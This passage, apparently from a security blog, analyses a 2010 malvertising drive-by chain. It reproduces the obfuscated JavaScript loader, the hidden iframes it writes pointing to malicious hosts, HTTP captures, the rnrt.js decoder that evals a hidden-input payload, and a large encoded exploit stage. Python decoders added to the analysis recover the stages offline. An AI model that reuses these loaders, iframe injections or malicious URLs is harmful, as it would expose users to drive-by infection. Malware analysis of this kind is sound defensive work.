=PdaPJkPaqPdrPJ2PdrPk3PdrPdOPkgPJkPdiPdkPd=PkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmParPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3PJMPdkPi3PJiPaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrMPdgPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJOParPJ2PdaPJiPJJPkgPadPJ2Pd=Pd=PdrPaiPkkP=OPaiPkaP=JPaiPkaP=JPd=PdaPJOPJkPJmPJ/PJqPJdPaqPJkPJ3PJgPadParPd=PJOPdaPJdPJiPd=PkgPadPi3PJaPJsPJOPJqPJmPadPaiPkkP=iPaiPkkP=kPJ/PJgPJdParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PJaPJ=PJaPa3PdrPJ/Pd2PJiPJsPaqPJdPJ/PJJPadParPJaPJ3PdaPJ=PJiPdaPkgPadPkrPadParPaiPkkP=iPaiPkkP=kPa3PJOPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrM';var jlgkds='C9H6fshixZO4/NBSIeX:=PapknRrc1D0vM3A.T&amp;gQGJ82K?t7yYVbu_-Wwqo%jUmElLdzF5';var GaJhym='s/0JF%4zlEe=Y5mVTxIK6wuDjQ-t?OgrASkMfhB9.Xn2avo:dGL&amp;HWU7cyR1PC_bqN8Zp3i';var _jNcLS='';var TOZI;var DdC;for(TOZI=0;TOZI&lt;IBpC.length;TOZI++){ DdC=GaJhym.indexOf(IBpC.charAt(TOZI));if(DdC&gt;-1){ _jNcLS+=jlgkds.charAt(DdC);}}JXzn_(uhbnP(_jNcLS));</pre>
<p>Now this JavaScript looks like a lot of junk, but it is pretty easy to deobfuscate using tools like the Firefox Firebug extension or great online tools like JSUnpack. We have submitted the JavaScript above to JSUnpack and the report can be viewed here:<br />
<a href="http://jsunpack.jeek.org/dec/go?report=7bff4237dbcb5448c08c5c3b40f4c1d0a97c889b">http://jsunpack.jeek.org/dec/go?report=7bff4237dbcb5448c08c5c3b40f4c1d0a97c889b</a></p>
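<p>As an added example that is not part of the original post, here is the substitution step of the script above re-implemented in Python: each character of the IBpC string is looked up in the GaJhym alphabet and replaced by the character at the same position in jlgkds, and the result is unescaped. The final eval() is deliberately left out; the function names are this example&#8217;s own.</p>

```python
from urllib.parse import unquote

# Added example, not code from the original post or from the malvertising
# script: the substitution step of the c3metrics.net obfuscator re-implemented
# offline, so the payload can be recovered without the eval() the script ends with.

# The two alphabets exactly as they appear in the captured script.
PLAIN_ALPHABET = "C9H6fshixZO4/NBSIeX:=PapknRrc1D0vM3A.T&gQGJ82K?t7yYVbu_-Wwqo%jUmElLdzF5"   # jlgkds
CIPHER_ALPHABET = "s/0JF%4zlEe=Y5mVTxIK6wuDjQ-t?OgrASkMfhB9.Xn2avo:dGL&HWU7cyR1PC_bqN8Zp3i"  # GaJhym
assert len(PLAIN_ALPHABET) == len(CIPHER_ALPHABET)

# Opening characters of the captured IBpC string, kept here as a spot check.
SAMPLE_PREFIX = "PrMPdkPd=PJOPd=PJ/PJk"


def substitute(blob: str) -> str:
    """Map each character via GaJhym.indexOf(ch) -> jlgkds.charAt(index).

    Characters not in the cipher alphabet are silently dropped, exactly as the
    script's `if(DdC>-1)` check does, so stray whitespace from a copied page
    does not break decoding.
    """
    table = dict(zip(CIPHER_ALPHABET, PLAIN_ALPHABET))
    return "".join(table[ch] for ch in blob if ch in table)


def deobfuscate(blob: str) -> str:
    """Substitution followed by JavaScript-style unescape(). The script would
    then eval() the result; that is the step this example deliberately omits."""
    # unescape() turns each %XX into a single Latin-1 character, so mirror that
    # rather than unquote()'s default UTF-8 decoding.
    return unquote(substitute(blob), encoding="latin-1")


def obfuscate(script: str) -> str:
    """Inverse transform, used only to build test data for this example."""
    table = dict(zip(PLAIN_ALPHABET, CIPHER_ALPHABET))
    escaped = "".join("%%%02X" % ord(ch) for ch in script)  # every char as %XX
    return "".join(table[ch] for ch in escaped)


if __name__ == "__main__":
    print(repr(deobfuscate(SAMPLE_PREFIX)))  # prints: '\nstatic'
```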
<p>The part of this report we are concerned with is right here; this is what ends up being written into the HTML document. Please do not go to the URLs below unless you are performing research within your sandboxes or on sacrificial lambs:</p>
<pre>&lt;iframe src='http://wilstose.co.cc/zmtrc.php?pq=cust1' style='visibility:hidden;' width='1' height='1'&gt;&lt;/iframe&gt;
&lt;iframe src='http://c3metrics.net/stats_js_e.php?id=&lt;REMOVED&gt;' style='visibility:hidden;' width='1' height='1'&gt;&lt;/iframe&gt;
&lt;a href='http://tracking.com' target='_blank'&gt;&lt;img src='http://c3metrics.net/bdb/pixel.gif' border='0'&gt;&lt;/a&gt;</pre>
<p>Now, at this point the client will perform requests to the URIs in the two IFRAMEs along with the gif. First we will look at the request to the stats_js_e.php file, which is used purely for tracking purposes. The id= variable passed to it is a simple UNIX timestamp. We have removed it from our examples here (but it is obviously still available in the jsunpack report if you care to see it).</p>
<pre>GET /stats_js_e.php?id=&lt;REMOVED&gt; HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&amp;v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: c3metrics.net
Connection: Keep-Alive</pre>
<p>As you can see, the response to this will not contain anything, as it is just for statistics and tracking purposes:</p>
<pre>HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 &lt;REMOVED&gt;
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 0</pre>
<p>Next we will look at the request to the wilstose.co.cc host. This is a request to an intermediary system that will produce a redirect to the actual drive-by site:</p>
<pre>GET /zmtrc.php?pq=cust1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&amp;v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: wilstose.co.cc
Connection: Keep-Alive</pre>
<p>The response contains the actual link to the live drive-by site, again inside a hidden IFRAME:</p>
<pre>HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 &lt;REMOVED&gt;
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 133</pre>
<pre>&lt;html&gt;
&lt;body&gt;
&lt;iframe src="http://bbcxq.com/ar/putyq.php" style="visibility:hidden;" width="1" height="1"&gt;&lt;/iframe&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
<p>This will now cause the client to perform a request against the bbcxq.com site:</p>
<pre>GET /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://wilstose.co.cc/zmtrc.php?pq=cust1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: bbcxq.com
Connection: Keep-Alive</pre>
<p>The response to this request will again serve up some obfuscated data that has to be deobfuscated using the script referenced in the response (in this case it is named rnrt.js):</p>
<pre>HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1615
Content-Type: text/html
Date: Mon, 02 Aug 2010 &lt;REMOVED&gt;
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14</pre>
<pre>&lt;html&gt;
&lt;head&gt;
&lt;script src="rnrt.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body uskbfxyp onload="OUWD();" nbl&gt;(EG)(NB)(X_)
&lt;input type="hidden" id="tm" value="4"&gt;(YU)(DJ)(KJ)
&lt;input type="hidden" id="GVaV" value="12#c63@f#b9773@0~2#68@8@94b60~64d3@618@98@db5a!768@ecebf#de7c743@f#73@417496e91114f#65c2#52#b52#df#d5c46656ddc8@16bb8@d641e2#a!98@65cda!e713@8@f#3@12#50~177b8@7f#a!b7a!f#cf#dd7d0~143@a!8@4158@b78@42#8@a!f#2#461f#72#4944db66e1f#158@8@ca!8@3@f#9592#5f#8@d42#47e67a!c0~2#e6da!a!7d650~6477b8@a!0~cf#76a!3@3@0~740~c657def#3@143@e42#cc61447d7f#9e55c47c4b4a!c6ba!5795a!2#78@3@48@7f#5560~2#3@111beec2#3@68@416c4cb0~3@a!498@2#b73@c53@13@0~df#a!52#8@ce50~8@6b6e6cd55d18@710~f#2#9de2#69cc7a!3@b2#7f#d3@973@518@6c4c1e17ca!3@548@68@eb18@8@b2#2#14f#b3@0~94a!457493@1918@9b0~9c1b7eb8@b9cb7490~8@748@9d7748@5563@1ef#3@2#f#58@b5c11c7be0~0~e99d174bf#59574ba!92#72#bc3@655de5f#d54c12#b3@5969db0~f#cb4bb63@8@3@5198@a!c78@40~2#452#41f#d518@4650~75f#f#e3@f#f#65760~b42#3@55466e613@2#dbe5c2#1f#54f#cdf#bcc7c10~d595db8@68@8@953@3@0~0~613@cbf#9c3@e0~7dc190~6df#8@f#3@0~ca!ea!cf#0~9bcb0~40~48@c8@78@8@cb0~8@2#2#be7678@61950~da!75f#3@a!8@4e10~7dd15cce8@d58@eb0~c6a!77448@63@f#b7b5c1f#8@43@8@8@98@8@f#8@40~3@3@2#6f#cb1169112#4e13@d42#d963@0~d13@40~8@3@e6e7a!3@3@98@46d0~5c1998@60~62#55148@b196652#10~3@1540~b2#60~8@a!1a!c1c9ea!b48@1ed698@e5d72#a!5b2#2#5d660~7dd12#f#c3@2#f#ca!50~464596ebb0~2#0~2#c0~3@f#60~5e140~95d719f#4cb69a!f#"&gt;
&lt;input type="hidden" id="xe" value="4"&gt;(P_)(MT)(GZ)
&lt;/body&gt;
&lt;/html&gt;</pre>
<p>This response causes the client to ask the server for the contents of the rnrt.js file, so the next request is made:</p>
<pre>GET /ar/rnrt.js HTTP/1.1
Accept: */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: bbcxq.com
Connection: Keep-Alive</pre>
<p>This delivers back the following response which has the JavaScript that will deobfuscate the data held within the hidden HTML input tag with the id of &#8220;GVaV&#8221;:</p>
<pre>HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 652
Content-Type: application/javascript
Date: Mon, 02 Aug 2010 &lt;REMOVED&gt;
ETag: &lt;REMOVED&gt;
Keep-Alive: timeout=1, max=99
Last-Modified: Mon, 02 Aug 2010 &lt;REMOVED&gt;
Server: Apache/2
Vary: Accept-Encoding,User-Agent</pre>
<pre>var _ryf=new Object();function hmww_(id){return (_ryf[id])?_ryf[id]:_ryf[id]=document.getElementById(id);};function OUWD(){var ZpG=String;var fnuk=Math;var pbRy='floorwuBYZXz'.replace(/[wuBYZXz]/g,'');var vPkaT=16;var YQu_='fromCnSTzBk'.replace(/[nSTzBk]/g,'')+"harCo"+"VwAdenygv".substr(3,2);var JbG=256;var Bau_=ZpG("evhwv".substr(0,2)+"al");var ru_bz=this;var GVaV=hmww_("GVaV").value;GVaV=GVaV.replace(/[\~@#\!]/g,'');var U_CZ=[471,541,759,116];var zRQQ="";for(var gn_=0;gn_&lt;GVaV.length/2;++gn_){var C_YL=parseInt(GVaV.substr(gn_*2,2),vPkaT)-(gn_+2)*U_CZ[gn_%4];if(C_YL&lt;0){C_YL-=fnuk[pbRy](C_YL/JbG)*JbG;}zRQQ+=ZpG[YQu_](C_YL);}ru_bz[Bau_](zRQQ);}</pre>
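<p>To read that hidden second stage without letting the kit's eval() run, the arithmetic in rnrt.js can simply be redone offline. The Python below is an added example, not code from the original post or from the kit; it uses the key from the captured rnrt.js above and, as its input, the first 24 encoded bytes of the GVaV value from the captured putyq.php response above (the regex helper assumes the id="..." value="..." layout seen in that capture).</p>

```python
"""Offline decoder for the rnrt.js hidden-input scheme (added example, not
part of the original post or of the kit).

rnrt.js strips the filler characters ~ @ # ! from the hidden input, reads the
rest as hex byte pairs, subtracts (i+2)*key[i%4] from the i-th byte, reduces
the result modulo 256 and eval()s the text that comes out.  Redoing that
arithmetic here lets an analyst read the stage without executing any of it."""
import re
from typing import List

# Key taken from the captured rnrt.js above: var U_CZ=[471,541,759,116];
RNRT_KEY: List[int] = [471, 541, 759, 116]

# Filler the kit sprinkles into the hex; rnrt.js removes it with /[\~@#\!]/g
FILLER = re.compile(r"[~@#!]")

# First 24 encoded bytes of the id="GVaV" value in the captured putyq.php
# response above (a prefix of the page's own capture, used here as input).
SAMPLE_GVAV = "12#c63@f#b9773@0~2#68@8@94b60~64d3@618@98@db5a!768@ecebf#de7c74"


def extract_hidden_value(html: str, element_id: str) -> str:
    """Pull value="..." of the hidden input carrying the given id.

    Assumes the captured layout, where id="..." is immediately followed by
    value="..." on the same tag.
    """
    pattern = r'id="%s"\s+value="([^"]*)"' % re.escape(element_id)
    match = re.search(pattern, html)
    if match is None:
        raise ValueError("no hidden input with id %r" % element_id)
    return match.group(1)


def decode_rnrt(encoded: str, key: List[int]) -> str:
    """Reverse the rnrt.js transform: strip filler, take hex pairs, subtract key."""
    clean = FILLER.sub("", encoded)
    if len(clean) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", clean):
        raise ValueError("payload is not an even run of hex digits after filler removal")
    out = []
    for i in range(len(clean) // 2):
        byte = int(clean[2 * i:2 * i + 2], 16)
        # rnrt.js does C_YL -= Math.floor(C_YL/256)*256 when the value goes
        # negative, which is exactly Python's non-negative modulo.
        out.append(chr((byte - (i + 2) * key[i % len(key)]) % 256))
    return "".join(out)


def decode_landing_page(html: str, element_id: str, key: List[int]) -> str:
    """Locate the hidden input in a captured body and decode its value."""
    return decode_rnrt(extract_hidden_value(html, element_id), key)


if __name__ == "__main__":
    # Shows the start of the stage the kit would have eval()ed: a document.write call
    print(decode_rnrt(SAMPLE_GVAV, RNRT_KEY))
```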
<p>Executing this JavaScript causes the client to POST back information to the server about what type of exploits to serve up. The JavaScript attempts to determine whether the host has Acrobat or Java (among other things) installed, and then the appropriate malicious PDF or Java class is served up to the client.</p>
<pre>POST /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: bbcxq.com
Content-Length: 40
Connection: Keep-Alive
Cache-Control: no-cache</pre>
<pre>id=53104c390ee1ebc861a1938a5958ea63%26np</pre>
<p>The value at the end of the ID is what tells the drive-by what types of exploits to serve up. In this case the &#8220;np&#8221; at the end means &#8220;no java&#8221; and &#8220;yes pdf&#8221;. The ID can end in any of the following values:</p>
<pre>np = no java,  yes pdf
jp = yes java, yes pdf
n  = no java,  no pdf
j  = yes java, no pdf</pre>
<p>The response to this POST contains the following obfuscated data that is processed and deobfuscated again by the rnrt.js file:</p>
<pre>HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 9310
Content-Type: text/html
Date: Mon, 02 Aug 2010 &lt;REMOVED&gt;
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14</pre>
<pre>&lt;html&gt;
&lt;head&gt;
&lt;script src="rnrt.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body oz_ljh_h onload="OUWD();" zub&gt;(LR)(X_)(YP)
&lt;input type="hidden" id="_x" value="4"&gt;(BH)(TJ)(SY)
&lt;input type="hidden" id="GVaV" value="14#cc4#a!#@~a!#@~77e34#278@28@6b20!24#53226d8@23924#f75ffe0!10!96b74#a!#@~78@739252f94#166bf1fe53f50!da!#@~0!a!#@~bcbc4#0!e696df8@57ca!#@~a!#@~5f395f4#18@1624#34#a!#@~172116e0!4#f55f6a!#@~fe4#f8@0!e76f536a!#@~18@f9ce0!c617bf4#6a!#@~4#264#7d573b2a!#@~0!4#d57c1d9b7259635320!4#59766db1ef20!0!cca!#@~c62f5a!#@~a!#@~a!#@~c5d4#b38@69530!3b29727ff2e8@1de350!0!b0!9fa!#@~8@cbbea!#@~8@f4#990!72fdbd9b510!d3179577c621fdbc91d2df62d4#6cf8@eb2eba!#@~b4#fd953d26375e99d318@a!#@~318@10!0!2bd21b8@f4#92f2c5ba!#@~96efb794#e27f74#3a!#@~14#fa!#@~91c0!215a!#@~5e7613e4#76ba!#@~6e71f3fcd6c4#75367e515278@c4#bf8@f0!e18@68@f8@3390!17355997e8@95a!#@~f62d5d365e594#0!f9ef0!61cd8@1f50!c56d670!2ce76ff5cb30!f73e58@5168@620!279be9d4#4#ea!#@~97e4#0!2a!#@~8@28@6b5f556f5eeed1a!#@~9395a!#@~ff8@e30!a!#@~9674#4#c70!76595a!#@~f8@5260!b77232255c8@b0!ef5b8@12b1da!#@~0!3c58@15c270!2956a!#@~7a!#@~637e3528@e221e1397ee79de90!90!1b8@3f7de64#fa!#@~3f3c65dfd699126fedd6df670!18@56b90!d6f0!58@7662c1659a!#@~68@6de2e0!f0!eccbc2d92a!#@~2d4#d8@0!a!#@~3e8@72c68@5c778@2ea!#@~3cf4#cc58@0!91b37d5a!#@~0!b79d4#5d0!b6f9b7664#50!de8@4#f61a!#@~594#64#170!6cf31a!#@~d758@4#0!e7cccf0!f65a!#@~d34#0!8@74#f7dd9a!#@~629cd5f75bbefda!#@~66c9964#8@4#2a!#@~2b9c4#297a!#@~3b2dbe0!28@99dc514#0!50!ba!#@~fe8@3e78@90!a!#@~c8@70!0!6a!#@~8@0!e1734#65d7de9112694#15cff327cbda!#@~b98@94#2a!#@~98@8@c2a!#@~4#94#5c0!b2d5d365d56ffcee2fbdb8@f0!9630!2a!#@~3a!#@~5f9cd71ba!#@~4#1b14#0!5be24#bc4#7d0!a!#@~5cd0!d58@20!3937f3f24#8@3d5a!#@~a!#@~b4#293a!#@~23e219919a!#@~73a!#@~fa!#@~1f78@4#7b0!1367b8@594#b14#56cf31ef73a!#@~4#bddcec29651ddd216a!#@~6be956e3a!#@~94#73ce63310!f33124#518@758@be8@d99712197f4#0!6cea!#@~34#9ce0!c61bbf669528@27d58@0!e9a!#@~c514#9c0!beb5399255370!963bc5fa!#@~53f13118@0!0!a!#@~67916a!#@~92d4#f8@7198@375a!#@~60!658@ee0!0!511a!#@~a!#@~18@1f0!73ec8@e1e6774#5d0!a!#@~9fcc1998@0!0!e357556795c2b2b0!71530!f3714#914#c3b9f0!f8@8@d21719d1b7a!#@~db9d34#a!#@~4#1a!#@~4#7bb0!1dc7190!550!30!0!64#a!#@~78@2297a!#@~3b2dbdfc
5d97d8@18@0!2dd6fa!#@~350!797fbcbbb95b8@3132e355631e718@e3bd54#fef2e8@cbd0!c4#3df8@7fa!#@~1d8@b8@8@e574#220!6b324#a!#@~9e4#0!0!3fd0!f18@ca!#@~0!a!#@~3c0!b98@a!#@~dea!#@~e171ff69bc0!26de18@d18@b70!b27b0!17bd4#ea!#@~57730!d8@8@7d8@a!#@~2d10!6f0!e2db138@4#8@ec2f9a!#@~9fa!#@~9cca!#@~4#38@66c52a!#@~2e74#616a!#@~e6e2528@5ed3d5b67a!#@~0!f998@6c2bbb59d652fa!#@~0!4#17c6f38@f9d8@ed20!d37b8@932d5dbfcda!#@~6bf34#6f57a!#@~9bedb758@eb629ed4#4#6ca!#@~7ca!#@~c63565eb50!8@6f2a!#@~922fe50!8@57be71a!#@~bf31d10!ca!#@~0!a!#@~6f8@299d7910!6759530!6a!#@~54#4#38@bf0!2d4#6ef2c0!5124#bd7e8@dd9c3e8@2b8@f9bba!#@~17723277754#7c621f27171a!#@~4#0!e9674#a!#@~1bcdc9f8@f28@a!#@~2132d36d8@1e0!a!#@~a!#@~2a!#@~d958@79fd34#8@d5cd8@8@ff8@1159a!#@~38@8@d1291be0!a!#@~d155b54#a!#@~5c9b7e4#65992f3c4#18@56fb0!3939cb4#0!f90!94#398@d5f58@30!ccda!#@~9df9c8@d7957f4#69659768@6119f3f8@21e96b50!fdd5a!#@~bc4#f58@90!754#b5597fa!#@~c914#5bf20!8@9f91bb0!4#9c9930!8@25b5d37c1d692f0!cdd39a!#@~764#b925e7d8@b1d94#368@71a!#@~9bbc0!4#d95fb34#4#54#957c4#0!519cf1ce10!50!f90!d9b96b20!998@9e378@757523ec6d297f7c2df9f7d4#0!9e5374#8@0!19993d8@c1690!b30!9d554#ba!#@~4#950!9a!#@~734#55d91f8@c31c55f0!0!2979bb90!e94#933e8@c535735cbde9cfec7db94#74#4#59a!#@~58@7b8@5159e34#8@11295ba!#@~0!ed159b14#e5c9f7a!#@~4#a!#@~5996ffc8@18@5a!#@~f70!79390!b0!0!390!98@358@15f5c3cc0!da!#@~91f5ccd7997b4#a!#@~965d728@a!#@~11933b8@61e9a!#@~b10!3dd5eb8@4#358@94#714#f559bf6cd14#5ffe0!c9f95b70!8@9c9d3c8@65b5133c5d696fcc1d39e72d0!20!937b6dee28@31ccff733ced1c27c3eb18@5dbb14#e5c4#224#21395a!#@~5b0!bfa!#@~f91526a!#@~11e8@6f3a!#@~660!b28@e6d0!a!#@~6f68@38@5bd58@91690!4#8@76d51a!#@~7f2eb978@f30!b8@8@d8@a!#@~8@0!24#bf0!19e2238@b6a!#@~b4#e5ecde97b8@3b373d5d5eb4#10!2dba!#@~28@ecf4#169eca!#@~c0!7a!#@~16a!#@~0!9ddb7f8@3662a!#@~f8@5c358@674#4#10!0!e7df18@d0!4#354#f1a!#@~0!a!#@~1c9c8@7a!#@~0!0!37a!#@~e4#552b28@8@10!bb2b5ced13934#0!ba!#@~660!c198@cc28@8@fc50!23f4#d520!8@16ba!#@~8@f9e2d790!cb3250!64#998@ec4#4#16a!#@~ea!#@~38@1c38@4#6a!#@~efa!#@~0!0!a!#@~c26d0!d50!397a!#@~ca!#@~
55e0!8@8@8@7dc177694#51ceb4#514#735f27edca!#@~e0!0!4#b0!2b4#bde8@0!8@7bfb550!eb3c8@c253fa!#@~d68@f8@9a!#@~174#bc8@f2962b90!5a!#@~0!6fc6cb673e33b0!6f2be0!0!6b5f90!d8@c8@cf78@a!#@~c1a!#@~4#e5370!8@1c124#4#bd8@2b0!c18@2ea!#@~be4#e0!9617b8@b7ee8@79c8@54#20!4#7c50!a!#@~6794#c25ffe8@28@f55b5d0!4#c5b6d0!e0!95134#3bc6770!b39f38@c632790!0!2ca!#@~8@50!dc8@60!f33a!#@~8@da!#@~8@b10!70!3dffe4#4#59673c0!15f3e99ce54#f5d78@b5a!#@~bcd54#8@90!e3b38@5b5eb71720!c72fe8@fd2297d1cd7210!a!#@~694#ce8@4#8@1672a!#@~fb6230!9374#34#0!5e7e0!10!d54#25ceca!#@~8@a!#@~5c3d57bf63ca!#@~94#8@52b38@b10!bb2b5ced13934#0!ba!#@~660!c198@cc28@8@fc50!23f4#d520!8@16ba!#@~8@f8@ded78@9c4#38@4#b6d9b8@ec4#4#0!6cea!#@~38@1d394#6a!#@~cf8@0!5a!#@~224#dcd0!0!699a!#@~ca!#@~55f0!c8@8@75ba!#@~7c64#4#517ef4#0!1572631ce8@ced30!0!b52650!e0!8@0!8@ec2b0!55e234#8@c253fa!#@~d68@f79c174#ec9f2922690!58@0!4#fc67b0!73e23b0!6ecb90!8@6260!94#d5bedc77a!#@~0!1f4#8@5270!7bbb294#0!dd38@0!0!1d3a!#@~9fe1e4#94#13bdb4#eb8@7a!#@~18@d4#20!0!755a!#@~9e7750!20!0!1eb28@fc5d5711cdb2d0!e598@0!e4#4#c0!696a!#@~b8@9d36c62c790!a!#@~22a!#@~0!54#d97e14#31a!#@~4#da!#@~8@8@0!c7736ffee4#0!9d6fc0!15f2e8@9ce54#e5f78@b5a!#@~a!#@~cc54#8@c0!93b355663a!#@~f1125c323edf520!97c9c4#770!ba!#@~594#db7f8@76d2a!#@~0!0!64#30!8@b6b3e0!0!e7df15d0!4#b5ceca!#@~59fcdc8@77fe37a!#@~c4#552b4#8@c10!ba!#@~265ce50!e98@38@b56b1114#8@7c8@7bfa!#@~5c1ef9d120!8@4#6ca!#@~8@f8@e0!d78@ecb3250!6598@8@ec4#4#0!65ea!#@~4#0!2330!4#ba!#@~cfe0!0!a!#@~71fd5d0!0!a!#@~97a!#@~ca!#@~55e0!8@8@8@75bc7b64#4#517f54#0!1b725f21e4#d3d3fdb4#324#7d98@4#8@7bbb8@54#de399520!4#2a!#@~d68@fb9b174#9c4#f78@b259558@ff0!8@67a!#@~a!#@~78@dd360!6ecb8@0!56268@9dd0!c3d375a!#@~0!274#e4#8@757a!#@~c324#4#bd62b0!515339fe1e4#9613bdb4#ea!#@~8@7998@4#4#7fb7555a!#@~66f54#24#fa!#@~ec2cf0!5e5c0!4#c7b8@cbe8@970!e4#6c260!71bb98@3dcc277b0!8@22a!#@~256d0!8@6162ca!#@~7e0!8@3127a!#@~36ffe94#0!9b77c0!1a!#@~fa!#@~dfa!#@~4#ea!#@~4#a!#@~5f8@3b0!a!#@~bcc5c8@0!0!73f3950!63b4#1620!bf27edf0!21a!#@~1c4#c57614#a!#@~0!95d38@37c652ef8@58@378@c673c0!a!
#@~e2e0!15d8@3e54#f0!a!#@~59a!#@~c8@cd79f63ca!#@~94#652b0!8@515a!#@~e24#61e4#0!a!#@~98@3db9660!c18@8@5c28@7f8@50!23f3d120!7f69a!#@~cf0!dbdc8@ec0!3b5760!9a!#@~9bbf4#165ee331d34#4#a!#@~a!#@~7fb0!6a!#@~227dbd0!0!393b5a!#@~0!5f0!8@9270!bb7b6c4#0!1bf74#0!1a!#@~7a!#@~5f24#ea!#@~ca!#@~dd0!3b0!2b4#be0!8@0!8@7c0!b550!e334#9520!3fa!#@~76df0!9f234#4#ca!#@~fd8@b259556ff0!164#a!#@~f73e53b0!6ecb90!a!#@~6260!94#d5beda!#@~79a!#@~0!274#f4#8@757a!#@~c124#4#5d630!0!0!1d3b9fe1e594#13c0!b4#e68@e9c8@0!4#e0!670!5ca!#@~56f592dfa!#@~e8@2df8@565c0!8@c9b2d0!e5960!e4#4#c16a!#@~6a!#@~bba!#@~230!d22e74#0!526a!#@~350!d58@214#2ca!#@~5de8@f0!8@753a!#@~0!3e4#4#79a!#@~6bc8@15eee7a!#@~6e0!565978@b5a!#@~bd254#8@50!73f30!5764#a!#@~f1629ba!#@~2bf2f0!219cc4#c57610!a!#@~0!95d38@97c6c31f35d358@c67390!4#e7db1ddd3e54#f0!a!#@~99a!#@~d0!d370!fb3bb0!4#0!5da!#@~f8@0!15b324#5ce50!e9f38@b56a!#@~0!b14#8@5c68@0!f0!5523f7cc28@7e63b1f4#d6df8@9c0!395160!98@95bf4#366ea!#@~3a!#@~20!30!53a!#@~df4#0!7a!#@~a!#@~1bd7d6fe97b3a!#@~0!610!98@8@7a!#@~c0!776b4#612f54#610!75651ce7d5d30!4#b8@2651e18@0!8@dc6b0!5ce22f932b3a!#@~b0!6ef0!a!#@~3234#4#cdfb8@b28@9a!#@~4#e0!4#0!16ca!#@~a!#@~8@0!e4#30!0!becbd0!0!696190!d7ca!#@~cf73a!#@~c1a!#@~4#a!#@~4#e70!7dc224#4#cda!#@~2b0!a!#@~1d2ea!#@~a!#@~e7e0!9617b8@b7f18@7a!#@~18@64#20!8@7c50!a!#@~b78@4#c28@0!4#e32df5625711ccb2d0!e5990!e4#6c260!71bf98@37d2277b0!622a!#@~0!55da!#@~7e1c37a!#@~0!df8@8@1170!3bfbef4#0!976fcb10